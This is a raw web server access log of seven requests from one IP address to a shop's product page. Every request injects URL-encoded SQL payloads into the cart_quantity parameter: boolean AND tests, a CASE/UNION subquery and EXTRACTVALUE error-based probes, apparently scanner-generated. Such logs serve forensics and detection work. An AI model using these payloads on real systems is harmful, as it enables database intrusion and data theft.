193.29.13.243 - - [17/Jul/2022:19:27:26 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%27%20AND%207696%3D6535%20AND%20%27qrrN%27%3D%27qrrN&products_id=56950 HTTP/1.0" 302 544 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:27 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=%28SELECT%20%28CASE%20WHEN%20%285826%3D7700%29%20THEN%201%20ELSE%20%28SELECT%207700%20UNION%20SELECT%206131%29%20END%29%29&products_id=56950 HTTP/1.0" 302 613 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:27 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%29%20AND%20EXTRACTVALUE%287151%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%287151%3D7151%2C1%29%29%29%2C0x71716b6a71%29%29%20AND%20%284181%3D4181&products_id=56950 HTTP/1.0" 302 646 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:27 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%20AND%20EXTRACTVALUE%287151%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%287151%3D7151%2C1%29%29%29%2C0x71716b6a71%29%29&products_id=56950 HTTP/1.0" 302 620 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:27 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%20AND%20EXTRACTVALUE%287151%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%287151%3D7151%2C1%29%29%29%2C0x71716b6a71%29%29--%20zIRc&products_id=56950 HTTP/1.0" 302 629 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:27 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%27%29%20AND%20EXTRACTVALUE%287151%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%287151%3D7151%2C1%29%29%29%2C0x71716b6a71%29%29%20AND%20%28%27TQtr%27%3D%27TQtr&products_id=56950 HTTP/1.0" 302 658 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
193.29.13.243 - - [17/Jul/2022:19:27:27 +0200] "GET /moki-bedspread-gray-p-56950.html?action=add_product&cart_quantity=1%27%20AND%20EXTRACTVALUE%287151%2CCONCAT%280x5c%2C0x7162707a71%2C%28SELECT%20%28ELT%287151%3D7151%2C1%29%29%29%2C0x71716b6a71%29%29%20AND%20%27yqWB%27%3D%27yqWB&products_id=56950 HTTP/1.0" 302 652 "-" "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
